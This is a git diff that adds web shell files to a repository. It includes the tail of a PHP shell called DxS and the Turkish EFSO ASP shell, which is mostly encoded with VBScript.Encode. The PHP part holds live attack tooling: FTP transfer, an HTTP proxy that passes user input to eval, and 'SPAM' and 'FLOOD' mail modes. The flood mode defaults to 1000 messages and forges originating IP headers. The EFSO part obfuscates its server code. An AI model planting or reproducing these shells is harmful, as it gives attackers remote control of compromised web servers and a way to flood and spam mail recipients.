+		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{
+		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{
+	if (!isset($_GET['dxparam']))
+		{
+		print '';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{
+		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else
+		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{
+		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{
+		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)
+		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/php/EFSO_2.php.txt b/php/EFSO_2.php.txt
new file mode 100644
index 0000000..eb6ff25
--- /dev/null
+++ b/php/EFSO_2.php.txt
@@ -0,0 +1,57 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%>
+<%#@~^4BkAAA==@#@&B3w?}P2NN.PLP~sm/O8KXPDCDm0ıx9CUPHl.ıVhışYı.~6W.PUC.UlF ;WH~ ,KÜ\P_)nS)"q,2L9+M~+,brYDYr.cOO@*@#@&EKÜH,u)|db"q~?)Fdq9q" R,|69dbI9),XCwm^mğıxhı.P(kD,Nğrşk0Vr3,|69!xPÇmsış:m:lkıUCPsl^PGV;.cP$E	[l	P[G^lXı~$bD~/K.!x~çı0lM/l,2x92"P'PUl#jz|R;GH,?WM;UV!P9+ğrV[rMR @#@&vA!PzC.ıVı:[C,onVbşObVhbşPDü:P4+MşnX,~~:mxOıVBPl^LWMkYsCSPHl.ıVıhVC.,?ıWıD9Cx,2%[DPOCMlWıx9C	Pzmyı^:ışYıMR,P2tb~~,Nü"n	P\[+,MöDü	üh~sm/D4GX~C,brYDrDc@#@&v:b|JİPd2İ]1G3gPFzÇqgq1cP(zPA992"@#@&@#@&B2N[+MPhmd~CAIA@#@&@#@&vb0~D5E/Ocrl4^E*PxPrrk3GrPDt+	@#@&vD/2W	/n 1WW0r+k`JHndJ*P{PEFE@#@&B.+k2W	/n 1WWVr/cJHnkJbc+XwkM+k~',xGh3&X+@#@&BUN,k0,@#@&Bb0,xGY~.;;+kOR1WGVb+/cEH+dJ*~{PE8J,Ytx@#@&BM+dwKxdnchDbO+,J@!1nUYD@*@!8D@*@!(D@*@!(.@*I2OVbxPzG0R P@!8M@*@!(D@*4X,İ/0GDakO6@!z^n	Y+M@*J@#@&BMndwKxk+ +U[v#@#@&Enx9PrW@#@&@#@&jD-+M Um.bwDKks+};Y,PxPF TT@#@&s!sValY4x.+aVmmn`]n$En/D ?D-nM.l.rm4s+kcrn):C|KIz1UJb:29J*~E&r~J'E#@#@&sbsnnmY4PxPhr9`oE^swmY4S&x?O."+-`w;^V2mY4~J'J*QF*@#@&sKV[nMnlD4P{PSWO`wE^V2lO4BqU?D.I\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j:j#q(I}!8 2**+G0,|OE@#@&mW	dY,3lMCVYD8'Eb$/G2oM_(9nS\H}np]j:j#oe\J@#@&mKx/DP0CDm3O+M xEm4m9n0TtkNVs:	Wa;./O;7haX.E@#@&NVCHkY~x,J@!tDh^@*@!4+mN@*@!YbOV@*3L9+.~G+x,VWM3~,;"l0P9E.R~Fmşıxhlc R@!zOrDV+@*@!Jtnl9@*@!4G9X@*@!mxDnD@*@!8D@*@!8.@*@!4M@*@!(D@*@!8.@*@!4@*A;Pj^Mk2YbUP:j\~4l3sCMk~2x9AI~PmkYbDc~j.+.k	Nn~}Xxmhl,XlkCVYbDcP@!z8@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*4z,2xf2"@!J8@*@!z^+	Yn.@*@!z(GNH@*@!J4O:^@*r@#@&NVCHkO ,xPr@!4OsV@*@!4l[@*@!ObYs@*(XPA9G3I@!zOkDVn@*@!ztCN@*@!4K[z@*@!mxO+.@*@!4.@*@!8D@*@!8.@*@!4.@*@!4.@*@!8@*A;,?1DkaY,rPnEsVmxhC,Cl0Vk	PXKV~lMYb3 Pe)klVVmUNbR ~,KÜDV~k+.\.,kU9lBPmK:cODBPLW7RO.,ok(rP0Vlök.~XmNmPdkOn,\CD,r/~~[bD+V~mVLıVmU9ıüıx[mPKYWslDr3,~~3!VsC	ı:ıxı.CPbyk	~-+M::n3On9k.R,i1`K\),3kS~(+UP(;,?^MkaYPbP:ü.3bXn:by~rçbx~B~Xm4l	^ıslMl,3CDşı~V!Vsl	sı:,NrzP5)t9ı: P@!&(@*~@!4M@*@!(D@*@!4M@*@!4M@*@!8M@*@!(@*4HP2x93I@!z(@*@!z^n	YnD@*@!z(W[z@*@!z4OsV@*J@#@&1WUkY,3lMl0O+M&xJZF+fW*vF0,r@#@&1GU/DP0l.lVOD*'rZ@$[^Y?Le`bR|_xU#,Y	N--=i@!@*~c_zr@#@&:mksmmDDmzP{PlM.CXvJHl4WGEBJ4WDhlbVESr:XUnDJSJThmksr~rtl13.J*P~Bö.+s~slk^s+MPXm.CYsl0PrçkUS,?Kbt~Nmx~VmçlDıhC0Prçk	 ,?n1EDkHPb~lşslVPbçkU~(XPABfAI@#@&;"l	Yb{CD.CHPxPm.DmXcE1W:ESrxnYrSr4r.JBJWMorSJTW-JBJ8.r~JbU0KJ#,@#@&Xm/m3ml..mX~',CDMlzcr2993"JSJU)j?)nJBJ5zMtiIr~EAİ"f3\r~J(rD9+:rSEA&IG2\JSEwbjK~65r~Ejz.?)FcZ6HrSrZ6tR:IJBJV6.cK]J*@#@&hkkY~',J?m#jlnR;W\J@#@&GkhPwjr@#@&jnDPsj6,'~ZMnmYn}4N+mD`rjmMk2YbxL wkVjXkY+s68LmDJbP@#@&0WUEs~',K.rs`Dn5!+dYvE0WU!:r##@#@&sGNPxPM+5;/YvE:KN+rb@#@&wW^NnDKCDt+P{~D;;nkY`EoKV[+MKmY4yJ*[J'J@#@&kkVn:,'~.;EdYvJkksn:r#@#@&[+s~{P.+$;+kYcE9+VEb@#@&Wk^n,'~M+$E+kYvE0bVnJ*@#@&WKVN.P{PD5;+kYvJWWs[DE#@#@&Ym4sn,P'~];;+kOvJOm4^+J*@#@&rxN+^Y8P~x,I+$;+kY`rrULmDFE#@#@&bx%+1O ,Px~"+;;nkYcJbUN+^D r#@#@&k	%+1YfP,'~];EdYvJk	%nmD&r#@#@&rUN+^YW~P{P]n$E+dOvJrxNn1Y*r#@#@&k	L^YlP~',In5!+/DcJbxL^O*r#@#@&^:[VKN~P{~I;;nkY`E^sNVW9E*@#@&4l13+9P{~D;;+kYcE4lm0nNr#@#@&KCY4P{P.+5;/O`rKlDtEb@#@&E.s,'~D5!+dD`rED^J*@#@&1W;xDPx~M+;!n/D`J1G;xDJ*@#@&/r"PxPMn;!+dOvJ/r"Jb@#@&[(xCs+,'PM+$;+kYcJ94UCs+J*@#@&943m[rP{PM+5EndD`EN(Vl9kEb@#@&N8db0.+,x,Dn$E/YvJ98/b0.+r#@#@&LN./$VP{~.+$E/O`EnNNnDk5Vr#@#@&k+m~x,Dn;!nkYcr/mJ*@#@&i/DhNlPx~M+;!n/D`J`dnDsNlJb@#@&CMlqP{~D;;nkY`ECMlqJ*@#@&l.m ,'PM+$;+kYcJmDC+r#@#@&VF,'PMn5E/D`E3qE*@#@&3y~',Dn5!+/Ocr3+J*@#@&3f,',D+$EdYvJV&r#@#@&0cP{~D;EdO`r3WJb@#@&AmkOk	LP{P.n$E+dOvJAlbObxLr#@#@&:!D^~',J4YDwl&JhhS J@#@&mK[rxTP{P.+5;/O`r^W9kULr#@#@&[byrP{~M+5!+kY`rNb"kr#@#@&`/n.k:Nl~',D+$;n/D`rjd+.dsNXJ*@#@&klsO,'P.n$En/Dcr/C^Yr#@#@&tmdtyPxPM+5;/YvEtm/tyEb@#@&tm/4&~x,Dn;!n/D`E4m/tfE*@#@&tmd4c~{PM+;!+kO`rtC/4cEb@#@&tmdtlP',.n;!+kYcJ4CktXJ*@#@&4ld4+P'~.;;+kOvJ4m/4vJ*@#@&4lkt{P{P.n$E+kO`rtlk4{J*@#@&tC/40,'~D5E/Ocrtld4RJb@#@&4m/4OP{PD;!n/D`Etm/41r#@#@&4lktFZ~xPM+$En/OcrtC/4q!r#@#@&slN~x,J3sU6r@#@&@#@&b0P0W	;:,'~JrPO4x@#@&VW	E:,x~sKV9+.nCO4@#@&+^d+@#@&oG^N+.KmY4P{~0WU!:@#@&+	N,r0@#@&@#@&b0~hKN+,xPrFJ,O4+	@#@&sGV[nMnCY4~',Dn5!+/O 6W.:vEM+hKYJ#@#@&0Gx!:~',Dn5!+/D 0KD:vE.+sWD+E#@#@&x[PbW@#@&@#@&UKVkdO,'~smsk+@#@&wKwEaP{~smVd+@#@&@#@&b0PsGNP',E+J,WMPhW[n,'~J2EPKD~hKN+~x,J{J,GMPhKNP',JREPKD~:KNn~{PJ8J,WD,hGNP{PEF{E,W.PsGNPx~rF%E~KD~:K[Px,J8,J,WM~:KNnP{PE+ZJPK.PsWN~xPr 8J~W.~sW[+,xPr +E,WD~hKNnP{~r *rP,WD,:K[+,'~Jy*E~KDPsGNP',E+vrPKD~:G[PxPr+GrPG.,:W[n,'~Jy0rPGMPsWNP{~Jy,EPKD~hKN+,xPr&!r~GD,:KNnPx~r&qJ,GD,:G[P'~E2 EPK.,:G9+,'Pr&2EPKD~:KNn~{PJ2J,WD,hGNP{PE&0E,W.PsGNPx~r&,E~KD~:K[Px,JW!J,WM~:KNnP{PE*8JPK.PsWN~xPrcyJ~W.~sW[+,xPrcfE,WD~hKNnP{~rc*rPKDPsW9nP{PEclJ~GMP:K[+,'Pr11J,Y4+U@#@&2Kw;w,xP:D;n@#@&+U[,kW@#@&@#@&kW,:KN+,',EvrPOtx@#@&"+/aGxk+R~;W0D{K.En@#@&?nY,ok^Px~w?r !Yok^nv0r^+*@#@&"+k2W	/nR1WUOxYDzw'Jm22VbmmYrWU&6W.mRNKhUsKlNE@#@&In/aG	/ncb9NCl9nD,J/l1tnR1WxD.W^J~r2.k7lD+E@#@&]/2W	d+cb[[_+l[nMPEZKUD+UDOd+xTY4E~,srVc?r"@#@&"n/aWxkn b9N_+CNn.,J/W	O+	YR9b/wGdbYrW	EBPEmYDlm4:UYpPWk^+UCs+'r~[,sk^ Uls+@#@&]+d2Kxd+c$k	l.zqDkOn,Dnl9$bxCMXwkV`wrVcwCY4#@#@&U+Y,WP{P1KO4k	o=Pj+O~wksP{~1KY4r	o@#@&./2W	dRn	N@#@&+	N,r0@#@&@#@&b0~UKYPsGNP',EG39kMJ~Y4n	@#@&ZmsV,onsTkY@#@&x[PbW@#@&@#@&D/wKxknRSDrYPE@!DkY^n@*As?}~+RZPwW.PjCj?C|c/WtP@!&DkYsn@*J@#@&MnkwG	/RhMkDnPr@!h+Dl~4DYw n;!k\{EEZKxD+UYRPHwnJr~mKxOn	Y'EED+aYJ4D:spP1tlM/O'b/GOR%X1 ,Jr@*J@#@&Dd2W	/RADrOPE@!kOX^+@*E@#@&DndaWU/ SDrD+,J4KNH`:mDLk	)T2Xi0KUY /YHsn)	WM:CVIWKxOOkry)qTa6i^G^W.)[owsowsp0W	Y WlsksX=.n.9lxmSbMkl^I8l13TDGEU[ mGVK.)[&Cfm&lId1DGV^8mDR6l1+O1W^GD=P:&Z&TfZi/1.W^V4m.Rtbo4Vro4O mGVK.),aX[lN*[Ikm.W^s(l. /4lNKh ^W^W.),aq+8 FyI/1DW^s8lMO2NskL4DO^W^GD=P:fm&lfCp/^DKs^4CMOmDDKh ^W^W.),a1[ON,9I/1DW^s8lMODDCmVR1WsWMlP[&Cfm&lId1DGV^8mDR9lM3/4l9Gh mGVKDl~[&l2C&mi8r@#@&D/aWU/n SDrY~Jc3q`6WxOR6lhk^z=r	o9kxT/p~0KxOOkk"n=F*aai)J@#@&.n/aW	/nRA.bYnPr 3y	WG	YOWCsksX=	4[bxT/i,0KUY /ry)qXa6i)E@#@&D+k2Gxk+ch.kOn,JONPWW	YRdDXVnl	W.:msp0G	Y /k.+=q!a6ImKVG.=aswoswsi6GUY 0m:rVzlj+.NmUlBb.rmViNE@#@&.+k2KxdRSDkD+,ElPmGVKDl:A22A32pY+XORNmKDCYrG	)UW	ni)J@#@&M+/2G	/nRS.bYn,Jm)tK\.	1WsWM):*Zl!^i)J@#@&.n/aW	/nRA.bYnPrC)7kdrD+N`^KVGD=:A23A2Ai8r@#@&.+kwGxk+ AMkY~Jm)\bdrYN=tG\n.PmGVK.)[cTCZ+mINr@#@&DdaWUk+chDbY~Jbx2ED~E@#@&D+k2W	/+cA.kD+,J 38.D:SJ@#@&D/2G	/+ AMkO+,Ek+smD	4mm0LDKEUN=afT2!&ZImKVWMl:swswsoiWG	YR0mhk^Xl#DNCUm~)DbC^iWKxDO/bylFZwai7+.Obml^Rl^ko	lhk9N^+IP4nbo4Y=q%pP8GMN+.R^+WY=qa6~kW^kN,al[*9*[i,4G.9+D .kTtY=q26,/KVrN~:8 q 8+i,4G.9+DR8KYOWsl8wa,/KVk9P[q 8 q pP8GMN+MRYKw)82aPkW^k[P:X9*[*9I8r@#@&./wGUk+ hMrD+~rY6YmDC	(l^3TDG;	N)[q 8 FyI^W^WM):soowsoi6GxDOWCskVzlj+.NmUm~)MkmVi6W	OOkk"+=FT2Xi\.Ybml^RCVbo	)hk[[^+IP4nkTtOl8%i~8KD[+MR^+WD)8w6,/Ksk9P:FyF+qyiP(GD9+D .ro4Y=F26~dKVrN,:*9*[X9iP8GMNnD 8KYOK:=FwXPkGVbN~alNX[lNi,8WMN+MROWa)8waPdG^k[P[q 8 q+p8J@#@&M+dwKUk+ SDbY+,J@!&/DXs+@*J@#@&C7gHAA==^#~@%>
+
+<!--EFSO Ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI Ejder e Aitttir.-->
+<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa EJDER & SaVSAK.CoM Sorunlu değildir..-->
+<!--Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan Ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
+<!-- TAKLİTLEİRNDEN KAÇININ. by EJDER-->
+
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function klasorkopya(yol){
+        NewWindow(yol,"",400,130,"no");
+    }
+    function mass(yol){
+        NewWindow(yol,"",555,600,"yes");
+    }
+    function tester(yol){
+        NewWindow(yol,"",600,600,"yes");
+    }  
+    function klasor(yol){
+        NewWindow(yol,"",420,450,"yes");
+    }    
+    function cmd(yol){
+        NewWindow(yol,"",550,555,"no");
+    }
+    function biz(yol){
+        NewWindow(yol,"",550,700,"no");
+    }  
+    function cmdhelp(yol){
+        NewWindow(yol,"",500,230,"no");
+    }   
+    function somur(yol){
+        NewWindow(yol,"",420,220,"yes");
+    }       
+</script>
+<script language="JavaScript">
+function openInMainWin(winLocation){
+	window.opener.location.href = winLocation
+	window.opener.focus();
+}
+</script>
+<%#@~^ZFwCAA==@#@&/;(PnVlkWM63!@#@&dKx~nMDWM~D/Esn~x6D@#@&P~~,?nY,WP{Poj}RMnOwWsN.vsG^NDnmY4b@#@&P~P,?nO,0m,xP6R?!8oW^NDd@#@&~,P~sK.PAl^4,0F~(	PWm@#@&id7Eq6Pq	/D.`6F 1m:nS,JmKhRDDJ*~@*P8PKD~P(UkY.`6qRglhnBPJLG7RODrb,@*~8PKDP,q	dYM`WFc1Ch~Pr^WsYDrb~@*,F,PGD~~&xdYMc08RHCs+~~ETW-YME*P@*,F,PWMP,(xkY.`6F Hm:+B~JTW\|O.J*P@*PqP~GMP~q	dYM`Wqc1lhnBPEmKh|Y.r#,@*P8P,GD,P(xkY.c6FRgC:~PrdC\kl0mG:Eb,@*~F,~WMP~(	/Y.c6F 1mh~~r/m\/m3|^WsJbP@*Pq~,WD,~q	/YMcWFc1m:n~~Ekl-/mVR1WhE*P@*~q,K4+	@#@&d7idE?+DPDn6D?ODlh6(L+1OP{P0kG ra+	Kn6OobVn`w;V^wCO4~ SOMEn~6C^/n*P@#@&didivY6O?DDnCsr4NnmDRMrO+dk	+cNVCHkO *@#@&id77EY+aOUY.+mh}4%mDRZ^WknxDn@#@&d77iB?OPD+6DjODlsr8Ln^DPxPgGY4kUL,@#@&77idvDdaWUk+c+x9`*@#@&id7Bx[~b0@#@&~P,PdbW~sKV9+.nCO4PxPr^)rPG.,sWs[DKlD4,'~rZ=JPDtU@#@&P~P,P~~,I+k2W	/+c	.kD+,J@!YC8^+~m^C/k'EE04DOhrJ~@*@!OM@*@!DN@*@!0KxD~m^ld/{JEV8JJ@*@!l,YkDsn'rJ,fryrUbPFWazl^l~',Klşı~ErP4DW{BELsbV+hlD4[rghW9+x+L3W	;:{J[wGsNDhlOt'Er[WFcHls+'ELKkhn{J'Ybh[EEPKxm^k1V'rJVVm/G.0WwHC`Dtkk 4D0*i.+O;Mx~0ms/iEE@*c@!&C@*@!&0KUD@*~@!0KxY,m^C/k'EJ0FEE@*@!l,~YbYVxEJ,fbyrxr~UksPrEP4DnW{BJ'obVnnmO4[EQ:KN+{cLVW	Eh'r[oG^N+MKlDt[r'[+^'r[oWs[DKlD4[rJ'W8R1Ch[E[:rs+xr[Dk:[rv@*û@!zC@*,F@!&6WxD@*@!6WxD~dk.+{ @*@!8@*@!l~YbOV'EE,fk"r	kUPbçr	+~VkMPJrP4.+6'vJLsrsnlD4[rg3KU;:{JLsGV[nMnCY4'Jr[Wqc1lhnLJ'Kbh'ELYb:+LJE@*JL0qR	lhnLJ@!JC@*@!z4@*@!&Y9@*@!zOD@*@!JYC4^n@*rP~~,PP~7@#@&~P,~i+sk+@#@&P,P,~P,P]+kwGUk+Rq.kD+Pr@!Ol(VP^VCdk'EJ08DD:EE,@*@!O.@*@!ON@*@!6WUDP1Vlk/{EJ0FEJ@*@!C~DkY^n'rJPGr"k	k,|GwzC^l~[,Plşı,JE~4D+WxEJ'sbsnCDtLJgsW9n'y[VW	Ehxr[sKsNDnmO4[r-r[WF Hm:n[r'Kb:nxr[Yrh[EB,G	msbm0'Jr3^C/KDVWaXCcDtkk tM+0*I.+DEMx~0Csk+IJr@*c@!zC@*@!z0GUD@*~@!6G	Y~1Vm//{JrVFrJ@*@!mP~ObYVxJrPfb"rxbPUksPEE,t.+6xBr[or^+nCO4[EgsG9+xW[0Wx!:{E[wWsNDKCDt[r'NV'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*û@!zm@*P8@!&0KxO@*@!0W	OPkkyx+@*@!4@*@!CPOrDVn'rEPGk"r	kx~rçbxnPVrMPErP4D+6'EE[wks+hlO4LJg0Gx!:'r'oW^NDKlO4LJwJLWFc1Ch[J'Pb:n'r'Dkh[rB@*r[6qR	lh+LJ@!&m@*@!J8@*@!zY9@*@!zDD@*@!&YC8^+@*J,~P@#@&~~,PP~~,+UN,r6@#@&,P,PP,P,]+kwGxk+ o^E/4@#@&,PP,Hn6D@#@&P~P~^mVsP4CYm@#@&n	NPd;(@#@&@#@&d!4~GWkXl}3!@#@&iWUPD.GMPDdEs+P	naY@#@&,P~PjnDPWP{~sUr !YsGs9+.`wG^NnMnmYt*@#@&~P,Pj+DPW^,'P6 sbV+k@#@&P,P,sGD~3mm4P6qP&x~W1@#@&~~,P~P,~9WdHlzNk,',WFcxC:@#@&~,PP,~P,xEs~xP&xUY.In-vNG/HCb9kSEcJ#@#@&,P~P,~,P;.l	Yk,',smm/n`"kL4D`NKdXmbNbSs+	`9WdXC)9kbO	;:*#@#@&,PP~~,P~NKA	?OMP{PJ@!l,OkDVn'rJ9GkXlHı~?bVJr~4D0{BE[or^+KlD4[rghG9+'X'0WUEsxr[oKV9+DhlD4[r[[+^'E'wWV9nDhlY4'E-r[6F 1Ch[E[:r:'E'Dk:n'rB@*û@!JC@*@!WKxDP0mmxh4[k	od@*@!lPDrY^+'rE~fKh	VGl[~Y~Jr~tM+WxEJ[or^+KlD4LJ_sW9+'+[6rV'E[6F 2mYtLE[0Wx!hxJLsKV[+.KmY4[r'Kb:nxr[Yrh[EB@*Í@!Jl@*@!z6WxD@*@!WW	Y~0mmnxSkxT[k	o/@*@!CPDkDVn'EE,fG/HCXı,|G2HlVC~LPPlşı,ErP4M+6'Br[wrVnCY4[E_sWNxGL0k^nxJL08R2lO4LJ'Kbh+{J'Ob:+'EEPGx1sbmV{Jr3Vm/K.3KwzlvY4rkRtMn0*iDO;D	